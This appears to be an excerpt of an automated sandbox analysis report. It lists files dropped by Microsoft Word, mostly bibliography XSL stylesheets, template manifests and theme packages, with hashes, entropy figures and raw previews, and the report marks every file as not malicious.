...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):314
                            Entropy (8bit):3.5230842510951934
                            Encrypted:false
                            SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                            MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                            SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                            SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                            SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):294178
                            Entropy (8bit):4.977758311135714
                            Encrypted:false
                            SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                            MD5:0C9731C90DD24ED5CA6AE283741078D0
                            SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                            SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                            SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):290
                            Entropy (8bit):3.5161159456784024
                            Encrypted:false
                            SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                            MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                            SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                            SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                            SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):344303
                            Entropy (8bit):5.023195898304535
                            Encrypted:false
                            SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                            MD5:F079EC5E2CCB9CD4529673BCDFB90486
                            SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                            SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                            SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):288
                            Entropy (8bit):3.523917709458511
                            Encrypted:false
                            SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                            MD5:4A9A2E8DB82C90608C96008A5B6160EF
                            SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                            SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                            SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):296658
                            Entropy (8bit):5.000002997029767
                            Encrypted:false
                            SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                            MD5:9AC6DE7B629A4A802A41F93DB2C49747
                            SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                            SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                            SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):332
                            Entropy (8bit):3.4871192480632223
                            Encrypted:false
                            SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                            MD5:333BA58FCE326DEA1E4A9DE67475AA95
                            SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                            SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                            SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):254875
                            Entropy (8bit):5.003842588822783
                            Encrypted:false
                            SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                            MD5:377B3E355414466F3E3861BCE1844976
                            SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                            SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                            SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):562113
                            Entropy (8bit):7.67409707491542
                            Encrypted:false
                            SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                            MD5:4A1657A3872F9A77EC257F41B8F56B3D
                            SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                            SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                            SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                            Malicious:false
                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):278
                            Entropy (8bit):3.535736910133401
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                            MD5:487E25E610F3FC2EEA27AB54324EA8F6
                            SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                            SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                            SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):523048
                            Entropy (8bit):7.715248170753013
                            Encrypted:false
                            SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                            MD5:C276F590BB846309A5E30ADC35C502AD
                            SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                            SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                            SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                            Malicious:false
                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):276
                            Entropy (8bit):3.5159096381406645
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                            MD5:71CCB69AF8DD9821F463270FB8CBB285
                            SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                            SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                            SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):558035
                            Entropy (8bit):7.696653383430889
                            Encrypted:false
                            SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                            MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                            SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                            SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                            SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                            Malicious:false
                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):276
                            Entropy (8bit):3.5361139545278144
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                            MD5:133D126F0DE2CC4B29ECE38194983265
                            SHA1:D8D701298D7949BE6235493925026ED405290D43
                            SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                            SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):290
                            Entropy (8bit):3.5081874837369886
                            Encrypted:false
                            SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                            MD5:8D9B02CC69FA40564E6C781A9CC9E626
                            SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                            SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                            SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):255948
                            Entropy (8bit):5.103631650117028
                            Encrypted:false
                            SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                            MD5:9888A214D362470A6189DEFF775BE139
                            SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                            SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                            SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):777647
                            Entropy (8bit):7.689662652914981
                            Encrypted:false
                            SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                            MD5:B30D2EF0FC261AECE90B62E9C5597379
                            SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                            SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                            SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                            Malicious:false
                            Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):290
                            Entropy (8bit):3.5091498509646044
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                            MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                            SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                            SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                            SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                            Malicious:false
